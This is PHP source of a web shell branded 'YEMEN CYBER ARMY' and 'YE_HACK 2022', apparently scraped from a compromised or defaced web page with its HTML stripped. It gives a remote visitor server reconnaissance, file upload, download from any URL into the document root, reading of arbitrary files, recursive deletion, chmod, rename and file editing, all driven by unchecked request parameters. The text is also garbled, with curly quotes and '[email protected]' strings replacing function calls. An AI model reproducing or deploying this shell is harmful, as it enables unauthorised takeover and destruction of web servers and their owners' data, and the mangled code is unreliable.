test




.

YEMEN CYBER ARMY

Logo of a company

NONE“;
} else {
$disf = ““.$disfunc.”“;
}

function author() {
echo “


YE_HACK 2022
“;
exit();
}

function cekdir() {
if (isset($_GET[‘path’])) {
$lokasi = $_GET[‘path’];
} else {
$lokasi = getcwd();
}
if (is_writable($lokasi)) {
return “Writeable“;
} else {
return “Writeable“;
}
}

function cekroot() {
if (is_writable($_SERVER[‘DOCUMENT_ROOT’])) {
return “Writeable“;
} else {
return “Writeable“;
}
}

function xrmdir($dir) {
$items = scandir($dir);
foreach ($items as $item) {
if ($item === ‘.’ || $item === ‘..’) {
continue;
}
$path = $dir.’/’.$item;
if (is_dir($path)) {
xrmdir($path);
} else {
unlink($path);
}
}
rmdir($dir);
}

function green($text) {
echo “

“.$text.”
“;
}

function red($text) {
echo “

“.$text.”
“;
}

echo “Server : “.$_SERVER[‘SERVER_SOFTWARE’].”
“;
echo “System : “.php_uname().”
“;
echo “User : [email protected]_current_user().” ( [email protected]().”)
“;
echo “PHP Version : [email protected]().”
“;
echo “Disable Function : “.$disf.”
“;
echo “Directory :  “;

foreach($_POST as $key => $value){
$_POST[$key] = stripslashes($value);
}

if(isset($_GET[‘path’])){
$lokasi = $_GET[‘path’];
$lokdua = $_GET[‘path’];
} else {
$lokasi = getcwd();
$lokdua = getcwd();
}

$lokasi = str_replace(‘\\’,’/’,$lokasi);
$lokasis = explode(‘/’,$lokasi);
$lokasinya = @scandir($lokasi);

foreach($lokasis as $id => $lok){
if($lok == ” && $id == 0){
$a = true;
echo ‘/‘;
continue;
}
if($lok == ”) continue;
echo ‘‘.$lok.’/’;
}

echo ‘

‘;
if (isset($_POST[‘upwkwk’])) {
if (isset($_POST[‘berkasnya’])) {
if ($_POST[‘dirnya’] == “2”) {
$lokasi = $_SERVER[‘DOCUMENT_ROOT’];
}
$data = @file_put_contents($lokasi.”/”.$_FILES[‘berkas’][‘name’], @file_get_contents($_FILES[‘berkas’][‘tmp_name’]));
if (file_exists($lokasi.”/”.$_FILES[‘berkas’][‘name’])) {
echo “File Uploaded !  “.$lokasi.”/”.$_FILES[‘berkas’][‘name’].”

“;
} else {
echo “Failed to Upload !

“;
}
} elseif (isset($_POST[‘linknya’])) {
if (empty($_POST[‘namalink’])) {
exit(“Filename cannot be empty !”);
}
if ($_POST[‘dirnya’] == “2”) {
$lokasi = $_SERVER[‘DOCUMENT_ROOT’];
}
$data = @file_put_contents($lokasi.”/”.$_POST[‘namalink’], @file_get_contents($_POST[‘darilink’]));
if (file_exists($lokasi.”/”.$_POST[‘namalink’])) {
echo “File Uploaded !  “.$lokasi.”/”.$_POST[‘namalink’].”

“;
} else {
echo “Failed to Upload !

“;
}
}
}

echo “Upload File : “;
echo ‘

current_dir [ ‘.cekdir().’ ]
document_root [ ‘.cekroot().’ ]



 

‘;
echo “

“;

if (isset($_GET[‘fileloc’])) {
echo “

Current File : “.$_GET[‘fileloc’];
echo ‘

‘;
echo “

".htmlspecialchars(file_get_contents($_GET['fileloc']))."

“;
author();
} elseif (isset($_GET[‘pilihan’]) && $_POST[‘pilih’] == “hapus”) {
if (is_dir($_POST[‘path’])) {
xrmdir($_POST[‘path’]);
if (file_exists($_POST[‘path’])) {
red(“Failed to delete Directory !”);
} else {
green(“Delete Directory Success !”);
echo “string”;
}
} elseif (is_file($_POST[‘path’])) {
@unlink($_POST[‘path’]);
if (file_exists($_POST[‘path’])) {
red(“Failed to Delete File !”);
} else {
green(“Delete File Success !”);
}
}
} elseif (isset($_GET[‘pilihan’]) && $_POST[‘pilih’] == “ubahmod”) {
echo “

“.$_POST[‘path’].”
“;
echo ‘

Permission :



‘;
if (isset($_POST[‘chm0d’])) {
$cm = @chmod($_POST[‘path’], $_POST[‘perm’]);
if ($cm == true) {
green(“Change Mod Success !”);
} else {
red(“Change Mod Failed !”);
}
}
} elseif (isset($_GET[‘pilihan’]) && $_POST[‘pilih’] == “gantinama”) {
if (isset($_POST[‘gantin’])) {
$ren = @rename($_POST[‘path’], $_POST[‘newname’]);
if ($ren == true) {
green(“Change Name Success !”);
} else {
red(“Change Name Failed !”);
}
}
if (empty($_POST[‘name’])) {
$namaawal = $_POST[‘newname’];
} else {
$namawal = $_POST[‘name’];
}
echo “

“.$_POST[‘path’].”
“;
echo ‘

New Name :



‘;
} elseif (isset($_GET[‘pilihan’]) && $_POST[‘pilih’] == “edit”) {
if (isset($_POST[‘gasedit’])) {
$edit = @file_put_contents($_POST[‘path’], $_POST[‘src’]);
if ($edit == true) {
green(“Edit File Success !”);
} else {
red(“Edit File Failed !”);
}
}
echo “

“.$_POST[‘path’].”

“;
echo ‘





‘;
}

echo ‘

‘;

foreach($lokasinya as $dir){
if(!is_dir($lokasi.”/”.$dir) || $dir == ‘.’ || $dir == ‘..’) continue;
echo “

“;
}

echo ‘

‘;
foreach($lokasinya as $file) {
if(!is_file(“$lokasi/$file”)) continue;
$size = filesize(“$lokasi/$file”)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).’ MB’;
} else {
$size = $size.’ KB’;
}

echo “

“;
}
echo ‘

Name
Size
Permissions
Options
“.$dir.”
“;
if(is_writable($lokasi.”/”.$dir)) echo ‘‘;
elseif(!is_readable($lokasi.”/”.$dir)) echo ‘‘;
echo statusnya($lokasi.”/”.$dir);
if(is_writable($lokasi.”/”.$dir) || !is_readable($lokasi.”/”.$dir)) echo ‘
‘;

echo “





\” />

$file
“.$size.”
“;
if(is_writable(“$lokasi/$file”)) echo ‘‘;
elseif(!is_readable(“$lokasi/$file”)) echo ‘‘;
echo statusnya(“$lokasi/$file”);
if(is_writable(“$lokasi/$file”) || !is_readable(“$lokasi/$file”)) echo ‘
‘;
echo “





\” />

‘;
author();

function statusnya($file){
$statusnya = fileperms($file);

if (($statusnya & 0xC000) == 0xC000) {

// Socket
$ingfo = ‘s’;
} elseif (($statusnya & 0xA000) == 0xA000) {
// Symbolic Link
$ingfo = ‘l’;
} elseif (($statusnya & 0x8000) == 0x8000) {
// Regular
$ingfo = ‘-‘;
} elseif (($statusnya & 0x6000) == 0x6000) {
// Block special
$ingfo = ‘b’;
} elseif (($statusnya & 0x4000) == 0x4000) {
// Directory
$ingfo = ‘d’;
} elseif (($statusnya & 0x2000) == 0x2000) {
// Character special
$ingfo = ‘c’;
} elseif (($statusnya & 0x1000) == 0x1000) {
// FIFO pipe
$ingfo = ‘p’;
} else {
// Unknown
$ingfo = ‘u’;
}

// Owner
$ingfo .= (($statusnya & 0x0100) ? ‘r’ : ‘-‘);
$ingfo .= (($statusnya & 0x0080) ? ‘w’ : ‘-‘);
$ingfo .= (($statusnya & 0x0040) ?
(($statusnya & 0x0800) ? ‘s’ : ‘x’ ) :
(($statusnya & 0x0800) ? ‘S’ : ‘-‘));

// Group
$ingfo .= (($statusnya & 0x0020) ? ‘r’ : ‘-‘);
$ingfo .= (($statusnya & 0x0010) ? ‘w’ : ‘-‘);
$ingfo .= (($statusnya & 0x0008) ?
(($statusnya & 0x0400) ? ‘s’ : ‘x’ ) :
(($statusnya & 0x0400) ? ‘S’ : ‘-‘));

// World
$ingfo .= (($statusnya & 0x0004) ? ‘r’ : ‘-‘);
$ingfo .= (($statusnya & 0x0002) ? ‘w’ : ‘-‘);

$ingfo .= (($statusnya & 0x0001) ?
(($statusnya & 0x0200) ? ‘t’ : ‘x’ ) :
(($statusnya & 0x0200) ? ‘T’ : ‘-‘));

return $ingfo;
}
?>